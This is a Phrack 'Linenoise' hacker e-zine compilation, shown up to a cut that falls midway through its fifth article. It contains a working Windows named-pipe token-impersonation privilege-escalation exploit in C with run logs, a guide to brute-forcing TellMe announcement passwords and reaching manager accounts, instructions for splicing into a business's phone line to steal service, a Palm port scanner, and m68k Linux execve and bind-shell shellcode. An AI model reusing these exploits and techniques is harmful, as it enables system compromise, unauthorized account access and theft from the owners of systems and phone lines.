Plateforme de Hacking

                           ==Phrack Inc.==

              Volume 0x0b, Issue 0x3d, Phile #0x03 of 0x0f

|=---------------------=[ L I N E N O I S E ]=---------------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ Phrack Staff ]=-----------------------------=|

    Everything that does not fit somewhere else can be found here.
Corrections and additions to previous articles, to short articles or
articles that just dont make it....everything.


Contents

    1 - Windows named pipes exploitation                 by DigitalScream
    2 - How to hack into TellMe                          by Archangel
    3 - Shitboxing                                       by Agent5
    4 - PalmMap v1.6 - Nmap for Palm                     by Shaun Colley
    5 - Writing Linux/mc68xxx shellcode                  by madcr
    6 - Finding hidden kernel modules (the extrem way)   by madsys
    7 - Good old floppy bombs                            by Phrick


|=-----------------------------------------------------------------------=|
|=-=[ 1 - Windows named pipes exploitation ]=----------------------------=|
|=-----------------------------------------------------------------------=|

by DigitalScream  / SecurityLevel5

All latest versions of  Microsoft Windows  family  operation  systems  are
based on  Windows NT kernel. This fact has positive impact for both remote
and local security  of  Windows  world. There  are still  some thin places
though allowing  obtaining  Local System  privileges on the local computer
leading  to  the  full  system  compromise.   Usually   this   is  because
different buffer  overruns in  stack or heap  in system  services, like in
case of  any operation system. However  we should not  forget about system
specific bugs  because of abnormal behavior of system functions. This kind
of  bugs is very  system dependant  and  from  time  to time is discovered
in different OS. Of cause, Windows is not exception.

Specific bugs are  usually having impact on local users. Of cause, this is
not a kind  of axiom,  but local  user  has  access  to  larger  amount of
the  system  API  functions comparing with  remote one. So, we are talking
about  possibility   for   local  user  to  escalate  his  privileges.  By
privilege escalation we  mean obtaining privileges of Local System to have
no  limitations  at  all. Now  there  are few  ways to get it, I will talk
about new one.

According to  MSDN  to launch  application with different account one must
use  LogonUser() and CreateProcessAsUser() functions. LogonUser() requires
username and password for account we need. 'LogonUser()'  task  is to  set
SE_ASSIGNPRIMARYTOKEN_NAME   and   SE_INCREASE_QUOTA_NAME  privileges  for 
access token. This privileges are required for CreateProcessAsUser(). Only
system processes have these privileges.  Actually  'Administrator' account
have no enough  right  for  CreateProcessAsUser().  So,  to  execute  some
application,  e.g.  'cmd.exe'  with  LocalSystem  account  we must have it
already. Since  we do not have username and password of privileged user we
need another solution.

In this paper  we will obtain  'LocalSystem'  privileges  with file access
API. To open file Windows application call CreateFile()  function, defined
below:

HANDLE CreateFile(
        LPCTSTR               lpFileName, 
        DWORD                 dwDesiredAccess, 
        DWORD                 dwShareMode, 
        LPSECURITY_ATTRIBUTES lpSecurityAttributes, 
        DWORD 		      dwCreationDisposition, 
        DWORD 	              dwFlagsAndAttributes, 
        HANDLE 	              hTemplateFile 
        ); 

To open file we must call something like

HANDLE hFile;
hFile=CreateFile(szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, 
                             OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

For  advanced  Windows  programmer  it's clear that this function has more
application  rather  than  only opening   ordinary   files.  It's  used to
openor create  new  files, directories,  physical  drives,  and  different
resources for  interprocess  communication,  such as pipes  and mailslots.
We will be concerned with pipes.

Pipes  are  used for one-way  data exchange  between  parent  and child or
between  two  child  processes.  All  read/write   operations are close to
thesame file operations.

Named  Pipes are used  for two-way data exchange between client and server
or between two client  processes.  Like pipes they are like files, but can
be used to exchange data on the network.

Named pipe creation example shown below:

  HANDLE hPipe = 0;
  hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, 
                           PIPE_TYPE_MESSAGE|PIPE_WAIT, 2, 0, 0, 0, NULL);
|=----------------------------------------------------------------------=|
Named  pipe's  name can  vary,  but  it  always  has   predefined  format. 
The example of  valid name  is  '\\.\pipe\GetSys'.   For  Windows,  '\\.\'
sequence always precedes  filename,  e.g.  if  "C:\boot.ini"  is requested
system  actually   accesses  '\\.\C:\boot.ini'. This  format is compatible
with UNC standard.

With basic knowledge of named pipes operations we can suppose there can be
a way to full  application to access  named pipe  instead of user supplied
file. For example, if we created named pipe  "\\.\pipe\GetSys" we  can try
to force application to access "\\ComputerName\pipe\GetSys". It gives us a
chance to manipulate with access token.

Impersonation token is  access  token  with  client's privileges. That is,
this is possibility for server to do  something on client's behalf. In our
case server  is named pipe we created. And it becomes possible  because we
are granted SecurityImpersonation privilege for client. More precisely, we
can get  this privilege.  If  client  application  has privileges of local
system we  can get access  to registry,  process and memory management and
another possibilities not available to ordinary user.

This attack can be easily realized in practice.  Attack  scenario for this
vulnerability is next:

1. Create name pipe

Wait client connect after named pipe is created. 

2. Impersonate client

Because  we assume client  application has system rights we will have them 
too.

3. Obtain required rights. In fact, we need only 

 - SE_ASSIGNPRIMARYTOKEN_NAME	
 - SE_INCREASE_QUOTA_NAME

 - TOKEN_ALL_ACCESS
 - TOKEN_DUBLICATE

This is all  we need for  CreateProcessAsUser() function. To obtain rights
we  need  new  token  with  TOKEN_ALL_ACCESS privelege.  And we can do it,
because we have privileges of client process.

Execute code of our choice
        

It could be registry  access,  setting  some hooks or random commands with
system privileges. Last one is  most  interesting,  because we can execute
standalone application of our choice for our specific needs.

As it was said before, now I can execute CreateProcessAsUser() with system
 privileges. I  back  to  beginning,  but  this  time  I have all required
privileges and 'LocalSystem' is under my thumb.

There  is no problem to realize  this approach. As an example, we will use
working  exploit   by    wirepair at sh0dan.org    based   on   the   code
of maceo at dogmile.com.

#include 
#include 

int main(int argc, char **argv)
{
   char szPipe[64];
   DWORD dwNumber = 0;
   DWORD dwType = REG_DWORD;
   DWORD dwSize = sizeof(DWORD);
   DWORD dw = GetLastError();
   HANDLE hToken, hToken2;
   PGENERIC_MAPPING pGeneric;
   SECURITY_ATTRIBUTES sa;
   DWORD dwAccessDesired;
   PACL pACL = NULL;
   PSECURITY_DESCRIPTOR pSD = NULL;
   STARTUPINFO si;
   PROCESS_INFORMATION pi;

   if (argc != 2) {
          fprintf(stderr, "Usage: %s \n", argv[0]);
          return 1;
   }

   memset(&si,0,sizeof(si));
   sprintf(szPipe, "\\\\.\\pipe\\GetSys");

// create named pipe"\\.\pipe\GetSys"

   HANDLE hPipe = 0;
   hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, 
                     PIPE_TYPE_MESSAGE|PIPE_WAIT, 2, 0, 0, 0, NULL);
   if (hPipe == INVALID_HANDLE_VALUE) {
     printf ("Failed to create named pipe:\n  %s\n", szPipe);
     return 2;
   }

   printf("Created Named Pipe: \\\\.\\pipe\\GetSys\n");

// initialize security descriptor to obtain client application
// privileges
   pSD = (PSECURITY_DESCRIPTOR) 
                        LocalAlloc(LPTR,SECURITY_DESCRIPTOR_MIN_LENGTH); 
   InitializeSecurityDescriptor(pSD, SECURITY_DESCRIPTOR_REVISION);
   SetSecurityDescriptorDacl(pSD,TRUE, pACL, FALSE); 
   sa.nLength = sizeof (SECURITY_ATTRIBUTES);
   sa.lpSecurityDescriptor = pSD;
   sa.bInheritHandle = FALSE;

   printf("Waiting for connection...\n");

// wait for client connect
   ConnectNamedPipe (hPipe, NULL);

   printf("Impersonate...\n");

// impersonate client

   if (!ImpersonateNamedPipeClient (hPipe)) {
     printf ("Failed to impersonate the named pipe.\n");
     CloseHandle(hPipe);
     return 3;
   }

   printf("Open Thread Token...\n");

// obtain maximum rights with TOKEN_ALL_ACCESS

   if (!OpenThreadToken(GetCurrentThread(), 
                                TOKEN_ALL_ACCESS, TRUE, &hToken )) {

             if (hToken != INVALID_HANDLE_VALUE) {
                     printf("GetLastError: %u\n", dw);
                     CloseHandle(hToken);
                     return 4;
		 }
   }
   
   printf("Duplicating Token...\n");

// obtain TOKEN_DUBLICATE privilege
   if(DuplicateTokenEx(hToken,MAXIMUM_ALLOWED,
        &sa,SecurityImpersonation, 
                TokenPrimary, &hToken2) == 0) {

          printf("error in duplicate token\n");
          printf("GetLastError: %u\n", dw);
          return 5;
   }

// fill  pGeneric structure
   pGeneric = new GENERIC_MAPPING;
   pGeneric->GenericRead=FILE_GENERIC_READ;
   pGeneric->GenericWrite=FILE_GENERIC_WRITE;
   pGeneric->GenericExecute=FILE_GENERIC_EXECUTE;
   pGeneric->GenericAll=FILE_ALL_ACCESS;

   MapGenericMask( &dwAccessDesired, pGeneric );

   dwSize  = 256;
   char szUser[256];
   GetUserName(szUser, &dwSize);

   printf ("Impersonating: %s\n", szUser);
   
   ZeroMemory( &si, sizeof(STARTUPINFO));
   si.cb = sizeof(si);
   si.lpDesktop	        = NULL;
   si.dwFlags	        = STARTF_USESHOWWINDOW;
   si.wShowWindow       = SW_SHOW;

   printf("Creating New Process %s\n", argv[1]);  

// create new process as user
   if(!CreateProcessAsUser(hToken2,NULL, argv[1], &sa, 
        &sa,true, NORMAL_PRIORITY_CLASS | 
                CREATE_NEW_CONSOLE,NULL,NULL,&si, &pi)) {
      printf("GetLastError: %d\n", GetLastError());
   }

// wait process to complete and exit
   WaitForSingleObject(pi.hProcess,INFINITE);
   CloseHandle(hPipe);
  
   return 0;
}

This vulnerability gives  a  chance for us to obtain  system privileges on
local computer. The  only  condition  is system  process  must access this
channel. This  condition  is  easy  to  reproduce  with  system  services.
For example:

[shell 1]

>pipe cmd.exe
Created Named Pipe: \\.\pipe\GetSys
Waiting for connection...

[shell 2]

>time /T
18:15

>at 18:16 /interactive \\ComputerName\pipe\GetSys

New task added with code 1

[shell 1]
Impersonate...
Open Thread Token...
Duplicating Token...
Impersonating: SYSTEM
Creating New Process cmd.exe

Now we have new instance  of cmd.exe with system privileges. It means user
can easily obtain  privileges  of local system.  Of cause  reproduce  this
situation is easy only in case, there is a service, which can access files
on  user request.  Because  'at' command  requires  at  least  power  user
privileges  and may be used  to launch cmd.exe directly, without any named
pipe this example is useless.

In practice, this vulnerability may be exploited for privilege  escalation
by  the local user if Microsoft SQL Server  is installed. SQL  server runs
with system privileges and may be accessed with unprivileged user.  @Stake
reported vulnerability in  xp_fileexist  command. This command  checks for
file existence and we can use it to access our named pipe. Attack scenario
is nearly same:

[shell 1]

>pipe cmd.exe
Created Named Pipe: \\.\pipe\GetSys
Waiting for connection...

[shell 2]

C:\>isql -U user
Password:
1> xp_fileexist '\\ComputerName\pipe\GetSys'
2> go
   File Exists File is a Directory Parent Directory Exists
   ----------- ------------------- -----------------------
             1                   0                       1

[shell 1]

Impersonate...
Open Thread Token...
Duplicating Token...
Impersonating: SYSTEM
Creating New Process cmd.exe

At the   end,  it's good  to  point  that  this  vulnerability  exists  in
Windows   NT/2000/XP   and  is   patched   with   Windows   2000  SP4  and
on Windows 2003.

A big thank to ZARAZA(www.security.nnov.ru), without him, nothing could be
possible.


[1] Overview of the "Impersonate a Client After Authentication"
http://support.microsoft.com/default.aspx?scid=kb;[LN];821546

[2] Exploit by maceo
http://www.securityfocus.com/archive/1/74523

[3] Exploit by wirepair
http://www.securityfocus.com/archive/1/329197

[4] Named Pipe Filename Local Privilege Escalation
www.atstake.com/research/advisories/2003/a070803-1.txt

[5] Service Pack 4 for Windows 2000 
http://download.microsoft.com/download/b/1/a/
b1a2a4df-cc8e-454b-ad9f-378143d77aeb/SP4express_EN.exe


|=-----------------------------------------------------------------------=|
|=-=[ 2 - How to hack into Tellme ]=-------------------------------------=|
|=-----------------------------------------------------------------------=|

How to get into the Tell-Me network.
(1-800-555-tell)

    This is a representation of someone's thoughts. Thoughts cannot be
owned by another person. Use this thought as you see fit, it is yours to
duplicate or use as you please.

By Archangel (Formerly of the P.H.I.R.M.)
Archangel Systems 
http://the.feds.are.lookingat.us
--------------------------------------


What is the Tell-Me system?
===========================

    TellMe is a high-tech voice activated phone site with internet
connectivity, and even a voice activated browser. It is the ultimate goal
of TellMe to have the whole of the internet voice activated. The system is
quite sophisticated by today's standards, though I'm sure that tomorrow's
readers will find the efforts to be quite primative to say the least. A
free phone call gives the listener access to news, sports, weather, etc.
Even movie listings. Other areas provide for private announcements, or even
voice activated web-sites. In other words, it is now possible, through
TellMe, to dial a phone number, and listen to a website. 

    Tell me is a subsidiary of CNET, a giant (at the time of this writing)
on the internet.

What security flaws were exploited?
===================================

    Well, I guess it's nut-cutting time. TellMe has a VERY SERIOUS security
flaw which can allow unauthorized access to the system within a matter of
hours. As I tried to hack into my own account, I realized that TellMenu
announcements only have a 4 digit numeric password.

Here's what you do:
- You dial 1-800-555-tell.
- You will get an automated banner-ad followed by a menu discribing
  various TellMe features.
- You must say the word "Announcements", or dial "198" on the keypad.
  This will take you to the announcements area.
- Once in the announcements area, you will need to punch in the
  announcement number, which is a seven digit number assigned to you by the
  TellMe computer.
- Type in any announcement number you wish (I tried with my own one first,
  as this was an experiment to see if I could hack in and change my own
  announcement).
  The computer says "Ok, here is your announcement."
  Then I heard a recording of The Baron Telling what a whimp I am.
- This was followed by the computer saying:
  Please type in another announcement number, or say "Main Menu" to
  continue. If you are the announcement manager, please use you telephone
  keypad to enter your password to edit the announcement. If you remain
  silent, the computer will say: "Please enter your 4 digit password."

FOUR DIGITS?????
Were they serious?

Now here's the kicker:
TELLME WON'T DISCONNECT YOU IF YOU FAIL 3 TIMES IN A ROW!!!
Yes, ladies and gentlement, keep trying to your heart's content.
No penalties.

Obviously a Brute Force hack was in order. I handled it by dusting off a
*VERY* old wardialer.

    I sat on an extention line, due to the limitations of the dialer, and
listened to it punching in access codes. When it succeeded, I could pause
the wardialer program. I would be able to look at the screen, and see what
the last couple of attempted numbers were, manually dial them in, and gain
access. I know there are easier methods, but this is what I did.

    The Baron had mercifully chosen a low number, and I was in, changing
the message in about ten minutes. I then tried two other *SAFE* messages,
that I would not get in trouble for, if changed. I gained access,
respectively, in 45 and 90 minutes (More or less). My math told me that the
maximum time to Brute Force a TellMe announcement was about three hours.

Is that it?
No, while having the ability to change any announcement may be a lot of
fun, there is a far more intersting hack that you can do on TellMe.
Remember how when you first sign on, you have to say "announcements"?
Try saying the word "Extensions". You may be quite surprised at what you
find.

What are Tell-Me extensions?
============================

    Tell-Me extensions are that part of the Tellme network, which they
have offered to the world to produce the voice activated web pages. Here
is what you do.

- Say "Extensions". You will be taken to the extensions area, and asked to
  punch in an extension number. This is a five digit number. It was time
  again for my ancient wardialer to do it's stuff. (Once again, no penalty
  for incorrect guesses!)

    First off, it is important at this point to mention that TellMe is a
dying concern. Most of the extensions are empty. The only extensions still
operating, are some extensions created by individual developers, Die-hard
developers, and (This is important later) TellMe's *own* extensions.

    Apparently, the idea was to use the extension number as a kind of
password, as there is no directory, and one must already know the extension
number in order to gain access.

    I checked into The San Remo hotel here in Las Vegas, under my
girlfriend's name, and spent the night hacking. Here's what I have come up
with so far:

Extension 76255:
----------------
    This leads to a very bizarre game of Rock/Paper/Scissors. It is one of
the wierdest things that I have ever come across in all my days. I HIGHLY
suggest you try it. It is like some whiney hillbilly guy...well see fer
yerself!

Extension 11111:
----------------
    A gypsy with an eight ball. You ask it questions, and it gives you
answers. There are no disclaimers, so I guess this is the real deal! Saying
"quit" or "Stop" won't help you. Just shut the hell up, and it will kick
you back into regular Tell-Me.

Extension 33333:
----------------
    Produces the words "HELLO WORLD"

Extension 34118:
----------------
    Produces a directory of TellMe's offices, with the regular phone
numbers.

Most of the worthy extensions consisted of foul language, so anyone
under 18 should stop reading now...

Use the letters on your telephone keypad, and you will get some very
intersting results. These are five letter words corresponding to the
numbers on your phone.

CUNTS - Produces a string of numbers of unknown meaning. Just a long
        string of a computer voice saying "one, five, seven, three, twelve,
	eighty-eight" etc. I'll figure out what that means later.

TITTY - This produces a fax tone, as opposed to a computer tone. I didn't
        mess with it.

PENIS - This produces a verbal message about the sendmail system.

HOLES - This is the Quote of the Day.

BOOBS - This has to do with HTTP protocols.

SHIT0 - This is a directory of phone lines in the TellMe system.

FUCK0 - This is a very interesting directory of phone lines in the TellMe
        system. Two of the lines appear to be trusted lines, providing a
	computer tone which I used to log on. There was a first time user
	option, which gave me a manager's account. (Do they have hundreds
	of managers?) What can it do? I was able to delete my own account
	and bring it back. I didn't fuck with anyone elses account. My goal
	is not to destroy, but to learn.

PISS0 - As above, the TellMe system addresses me with a choice of talking
        to a live person, or an automated directory of phone lines. I'm
	amazed this is all behind a five digit password.

Damn0 - Yet another directory of trusted phone lines. This one, however
        askes you for another password right up front, so I'm assuming this
	is a more security sensative area!

Pussy - A discription of how to configure a TellMe webpage.

Cum69 - Advice on proper password generation. (hahahahahahahahahaha!!!!)

EATME - Computer tone leading to nowhere.


The TellMe security protocols are pathetic.

Archangel (The Teflon Con)
Wrath of God Hand Delivered
http://the.feds.are.lookingat.us

|=-----------------------------------------------------------------------=|
|=-=[ 3 - Shitboxing ]=--------------------------------------------------=|
|=-----------------------------------------------------------------------=|

by Agent5

    So you're sitting in a small family owned type resturaunt or you're
walking through a small store looking at their various wares and, as normal
every couple times a day, you hear the call of nature. You make your way
towards the (preferably single occupancy) mens room (or ladies for those
few that may actually read this) and enter.  So your doing your thing and
you're lookin around checking out your surroundings (why? cause you're
supposed to be fucking observant at all times.Thats why.) Your gaze takes
you towards the ceiling. Looks like most most cheap drop down ceilings.
hmmmm.... drop down ceiling.....easily removable. So you stand on the
toilet, or whatever, and take a look. You pull out your pocket flashlight
and take a look. Nothing but wires. Couple elecrical or telephone maybe...
..TELEPHONE? Does this mean i can sit on the throne and use the fone?
Indeed it does!  All you need is a few things to help you make your dream
of phreaking at its absolute lazyest a reality.what you need will (besides
your beigebox with a RJ-11 plug on the cord) probably cost you, at an
extreme maximum, 3 bucks for parts and about 6 bucks for an telephone Line
Crimper for standard telephone plugs (RJ-11) you will also need a... 
"modular line splitter - Provides two telephone jacks when plugged into the
end of a telephone line cord. Standard 4-wire jacks. Color: Ivory"----bout
dollar and change max cost. Most of these parts, if not all, can be found
at your local radioshack. Now if you havent figured out what i'm getting at
yet, you should seek medical attention immediately, CAT-scans have helped
me alot.

    Heres what you do and make sure you do it quickly in case they try to
use the telephone while the line is disconnected. SO make sure you lock the
door and get to work fast....if you have people beginning to knock on the
door just make some nasty shitting sounds and say you'll be out in a
minute.

1. Cut the line. (no specific tools needed, something sharp will do)
2. Attach a plug to either end of the line you have just cut.
3. Put one end of the plug in one end of the modular line splitter, put the
   one thats left into one of the two holes on the front of the splitter.
4. Now you can either leave and let the intestinaly distressed old guy
   pouding on the door in, or you can plug your beige box in and have some
   fun.

    Treat this as you would any other beige boxing session. Keep in mind
that the people who own the telephone line may want to use it to and may
not enjoy having someone on the line already. But for the most part this
ordinary bathroom has just become a your private telephone booth, complete
with running water and a toilet for the astronomical sum of 3 dollars US.

"This file brought to you by the makers of sharp things."

Shoutouts to Epiphany, Bizurke, Master Slate, Ic0n, Xenocide, Bagel,
Hopping Goblin, Maddjimbeam, lioid, emerica, the rest of the #mabell
ninja's, port7 alliance, and LPH crew .


|=-----------------------------------------------------------------------=|
|=-=[ 4 - PalmMap v1.6 - Nmap for Palm ]=--------------------------------=|
|=-----------------------------------------------------------------------=|

(submitted by Shaun Colley )

-----BEGIN PALMMAP-----
# PalmMap.bas
# PalmMap v1.6 - Nmap for Palm.

fn set_auto_off(0)
s$(0) = "Host:"
s$(2) = "Start Port:"
s$(4) = "End Port:"
f = form(9, 3, "PalmMap v1.6")
if f = 0 then end
if f = 2 then gosub about
let h$ = s$(1)
let p = val(s$(3))
let e = val(s$(5))
let i = p
let t$ = "PalmMap.log"
open new "memo", t$ as #4
form2:
cls
form btn 30 , 40 , 40 , 18, "connect()", 1
form btn 85 , 40, 40 , 18 , "TCP SYN" , 1
form btn 60 , 80 , 40 , 18 , "UDP scan" , 1
form btn 60 , 120, 40 , 18 , "TCP FIN " , 1
draw "Scan type?", 50, 20, 1
while
x = asc(input$(1))
if x = 14 then gosub scan
if x = 15 then print "Scan type not implemented as of
yet."
if x = 16 then print "Scan type not implemented as of
yet."
if x = 17 then print "Scan type not implemented as of
yet."
wend

sub scan
cls
print at 50, 40
while(i <= e)
c = fn tcp(1, h$, i)
if(c = 0)
print "Port ", i, "Open"
fn tcp(-1, "", 0)
print #4, "Port ", i, "Open"
else
fn tcp(-1, "", 0)
print #4, "Port ", i, "Closed"
endif
let i = i + 1
wend
close #4
print "Scan complete!"
end

sub about
cls
msgbox("PalmMap - Nmap for Palm.", "About PalmMap
1.6")
-----END PALMMAP-----

|=-----------------------------------------------------------------------=|
|=-=[ 5 - Writing Linux/mc68xxx Shellcodez ]=----------------------------=|
|=-----------------------------------------------------------------------=|

 by madcr (madrats@mail.ru)


 I    Introdaction.
 II   Registers.
 III  Syscalls.
 IV   Execve shellcode. 
 V    Bind-socket shellcode.
 VI   References.


 I. Introdaction.

 The history Motorola begins already with 1920 then they let out radioelements 
 and about computers of nothing it was known. Only in 1974, motorola lets out 
 the first 8th the bit microprocessor - MC6800, containing 4000 transistors and
 in 1979 motorola announces the first 16th bit processor - MC68000, capable to 
 process up to 2 million operations per one second. After 5 more years, in 1984
 motorola relize the first 32th the bit processor (MC68020), containing 200000 
 transistors. Till 1994 inclusive motorola improved a series of the processors
 and in a result, in March, release MC68060 processor contained 2,5 million 
 transistors. In present days, 68060 is the optimal processor for use any unix.


 The processor can work in 2 modes: User and SuperVisor. It not analogy of the 
 real and protected mode in x86 processors. It some kind of protection
 "just in case". In the user mode it is impossible to cause exceptions and it 
 is impossible to have access to all area of memory. In supervisor mode all is
 accessible. Accordingly kernel work in Supervisor mode, and rest in User mode.


 MC68 supported various manufacturers unix, such as netbsd, openbsd, redhat 
 linux, debian linux, etc. Given article is focused on linux (in particular 
 debian).


 II. Registers.


 The processor as a matter of fact the CISC (but there are some opportunities 
 RISC), accordingly not so is a lot of registers: 

 Eight registers of the data: with %d0 on %d7.
 Eight registers of the address: with %a0 on %a7. 
 The register of the status:  %sr. 
 Two stack indexes: %sp and %fp 
 The program counter: %pc. 

 Basically it is not required to us of anything more. And the minimal set of 
 instructions which is required to us by development shellcode:


 instruction            example               description

   move                movl %d0,%d1           Put value from %d0 in %d1
   lea                 leal %sp@(0xc),%a0     calculate the address on 0xc to
                                              displacement in the stack and it
 					      is put in. %a0.
   eor                 eorl %d0,%d1           xor
   pea                 pea 0x2f2f7368         push in stack '//sh'



  In total these 4 instructions will be enough for a spelling functional 
  shellcode ?). And now it is high time to tell about the fifth, most important
 instruction (fifth, need us i mean) and about exceptions. The instruction trap
 - a call of exception. In processors motorola, only 256 exceptions, but of all
 of them are necessary for us only one - trap #0. In mc68 linux on this 
 exception call to a kernel, for execution system call. Trap 0 refers to a 
 vector located to the address $80h (strange concurrence). Now we shall stop on
 system calls more in detail.


 III. System Calls.


 System calls on the given architecture are organized thus:  

 %d0 - number of a system call.
 %d1,%d2,%d3 - argv

 i.e. to make banal setuid (0); we will have something unpretentious: 

 eorl %d2,%d2
 movl %d2,%d1
 movl #23,%d0
 trap #0

 Rather simple.


 IV. Execve shellcode.


 So, we shall start as always with old-kind execve:

 .globl _start
_start:
.text
	movl #11,%d0       /* execve()  (see unistd.h) */
	movl #m1,%d1       /* /bin/sh address          */  
 	movl #m2,%d2       /* NULL                     */
	movl #m2,%d3       /* NULL too                 */
	trap #0
.data
m1: .ascii "/bin/sh\0"
m2: .ascii "0\0".

# as execve.s -o execve.o ; ld execve.o -o execve
# ./execve
sh-2.03# exit
exit
#


 Such code will not go, since he not pozitsio-independent and did not check him
 on zero. Therefore we shall rewrite him with participation of the stack (since
 the machine at us big endian the order of following of byte needs to be taken
 into account):

.globl _start
_start:
        moveq #11,%d0         /* execve()            		    */
	pea 0x2f2f7368        /* //sh                		    */
 	pea 0x2f62696e        /* /bin  (big endian)  		    */
	movel %sp,%d1         /* /bin/sh in %d1      		    */
	eorl %d2,%d2          /* pea 0x0 + avoiding  		    */
	movel %d2,%sp@-       /* zero byte           		    */
 	pea 0x130             /* pea 0030 -> 0130 = kill the zero   */
	movel %sp,%d2         /* NULL in %d2                        */
	movel %d2,%d3         /* NULL in %d2                        */
	trap #0               /* syscall                            */

# as execve2.s -o execve2.o ; ld execve2.o -o execve2
# ./execve2
sh-2.03# exit
exit
#

 Very well. Now we shall mutate him in ascii and we shall look as it works:

char execve_shellcode[]=   
"\x70\x0b"           	      /* moveq #11,%d0               */
"\x48\x79\x2f\x2f\x73\x68"    /* pea 0x2f2f7368  -> //sh     */
"\x48\x79\x2f\x62\x69\x6e"    /* pea 0x2f62696e  -> /bin     */
"\x22\x0f"           	      /* movel %sp,%d1               */
"\xb5\x82"           	      /* eorl %d2,%d2    ->          */
"\x2f\x02"           	      /* movel %d2,%sp@- -> pea 0x0  */
"\x48\x78\x01\x30"            /* pea 0x130                   */
"\x24\x0f"           	      /* movel %sp,%d2               */
"\x26\x02"           	      /* movel %d2,%d3               */
"\x4e\x40";           	      /* trap #0                     */

main()
{
 int *ret;
 ret=(int *)&ret +2;
 *ret = execve_shellcode;
}


# gcc execve_shellcode.c -o execve_shellcode
# ./execve_shellcode
sh-2.03# exit
exit
#


 Our shellcode. Perfectly. But certainly it is not enough of it, therefore we
 shall binding this shellcode on socket.



 V. Bind-socket shellcode. 


 For the beginning we write our code on C:

#include <;;shiti;;>

main()
{
    int fd,dupa;    
    struct sockaddr_in se4v;

    fd=socket(AF_INET,SOCK_STREAM,0);
    se4v.sin_port=200;
    se4v.sin_family=2;
    se4v.sin_addr.s_addr=0;
    
    bind(fd,(struct sockaddr *)&se4v,sizeof(se4v));
    listen(fd,1);
    dupa=accept(fd,0,0);
    dup2(dupa,0);
    dup2(dupa,1);
    dup2(dupa,2);
    execl("/bin/sh","sh",0);
}

# gcc -static bindshell.c -o bindshell &
# ./bindshell &
[1] 276
# netstat -an | grep 200
tcp        0          0    0.0.0.0:200            0.0.0.0:*             LISTEN
# telnet localhost 200
Trying 127.0.01...
Connected to localhost.
Escape character is '^]'.
echo aaaaaaaaaaaa
aaaaaaaaaaaa
ctrl+c
[1]+ Done     ./bindshell


 All works. Now the last, that us interests - it as there is a work with a 
 network.

# gdb -q ./bindshell
(gdb) disas socket
Dump of assembler code for function socket:
0x80004734 :     moveal %d2,%a0
0x80004736 :   moveq #102,%d0
0x80004738 :   moveq #1,%d1
0x8000473a :   lea %sp@(4),%a1
0x8000473e :  movel %a1,%d2 
0x80004740 :  trap #0 
0x80004742 :  movel %a0,%d2
0x80004744 :  tstl %d0
0x80004746 :  bmil 0x80004958 <__syscall_error> 
0x8000474c :  rts 
0x8000474e :  rts
End of assembler dump.
(gdb)


 Perfectly. As well as everywhere - 102 = socket_call. 1 - sys_socket. 
 (for the full list look net.h). Proceeding from the aforesaid we shall write
 it on the assembler:

.globl _start
_start:

/* socket(AF_INET,SOCK_STREAM,0); ----------------------------------------- */
/* af_inet - 2, sock_stream - 1, ip_proto0 - 0 */

        moveq #2,%d0 
	movl %d0,%sp@        /* sock_stream */ 
	
	moveq #1,%d0     
	movel %d0,%sp@(0x4)   /* AF_INET     */
		
	eorl %d0,%d0
	movl %d0,%sp@(0x8)
	
	movl %sp,%d2    /* put in d2 the address in the stack on where our argv*/
	    	
	movl #0x66,%d0   /* socketcall (asm/unistd.h) */
	movl #1,%d1      /* sys_socket (linux/net.h)  */
	trap #0          /* go on vector 80 */


/* -bind(socket,(struct sockaddr *)&serv,sizeof(serv));-------------------- */

  	movl %d0,%sp@          /* in d0 back descriptor on socket */
                               
        move #200,%d0
	movl %d0,%sp@(0xc)     /* port number        */
	
	eorl %d0,%d0     
	movl %d0,%sp@(0x10)    /* sin_addr.s_addr=0  */
	
	moveq #2,%d0     
        movl %d0,%sp@(0x14)    /* sin_family=2       */   


/* Let's calculate the address of an arrangement of constants of the     */
/* second argument and we shall put this address as the second argument  */

        leal %sp@(0xc),%a0   
        movl %a0,%sp@(0x4)   

	moveq #0x10,%d0
	movl %d0,%sp@(0x8)    /* third argument 0x10 */

        movl #0x66,%d0        /* socketcall (asm/unistd.h) */
	movl #2,%d1           /* sys_bind (linux/net.h)    */
	trap #0               /* go on vector 80           */


/* listen (socket,1); ----------------------------------------------------- */
/* descriptor socket's already in stack.  				    */ 
/*------------------------------------------------------------------------- */ 
        moveq #1,%d0
        movl %d0,%sp@(4)

/* in d2 already put address of the beginning arguments in the stack */
         	
	movl #0x66,%d0       /* scoketcall (asm/unistd.h) */
	movl #4,%d1          /* sys_listen (linux/net.h)  */
	trap #0              /* go on vector 80           */

/* accept (fd,0,0); ------------------------------------------------------- */

       eorl %d0,%d0
       movl %d0,%sp@(4)
       movl %d0,%sp@(8)


       movl #0x66,%d0       /* scoketcall (asm/unistd.h) */
       movl #5,%d1          /* sys_accept (linux/net.h)  */
       trap #0              /* go on vector 80           */
	
/* dup2 (cli,0); ---------------------------------------------------------- */
/* dup2 (cli,1); ---------------------------------------------------------- */
/* dup2 (cli,2); ---------------------------------------------------------- */

       movl %d0,%d1
       movl #0x3f,%d0
       movl #0,%d2 
       trap #0

       movl %d0,%d1
       movl #0x3f,%d0 
       movl #1,%d2 
       trap #0

       movl %d0,%d1
       movl #0x3f,%d0 
       movl #2,%d2 
       trap #0
       
/* execve ("/bin/sh"); ----------------------------------------------------- */
      
      movl #11,%d0       /* execve */
      pea 0x2f2f7368     /* //sh   */
      pea 0x2f62696e     /* /bin   */ 
      movl %sp,%d1       /*  /bin/sh in %d1 */

      eorl %d2,%d2       
      movl %d2,%sp@-     /* pea 0x0 */ 
      pea 0x0130         /* 0030 -> 0130 = kill the zero */
      
      movl %sp,%d2
      movl %d2,%d3 
      trap #0

/* ---EOF---bindsock shellcode--------------------------------------------- */


# as bindshell.s -o bindshell.o ; ld bindshell.o -o bindshell
# ./bindshell &
[309]
# telnet localhost 200
Trying 127.0.01...
Connected to localhost.
Escape character is '^]'.
echo aaaaaaaaaaaa
aaaaaaaaaaaa
ctrl+c

 In general and all. The code certainly super-not optimized, is some zero, but
 the general picture I hope has given. And at last how it should be:


char bind_shellcode[]=
"\x70\x02"           	      /*  moveq #2,%d0          */
"\x2e\x80"           	      /*  movel %d0,%sp@        */
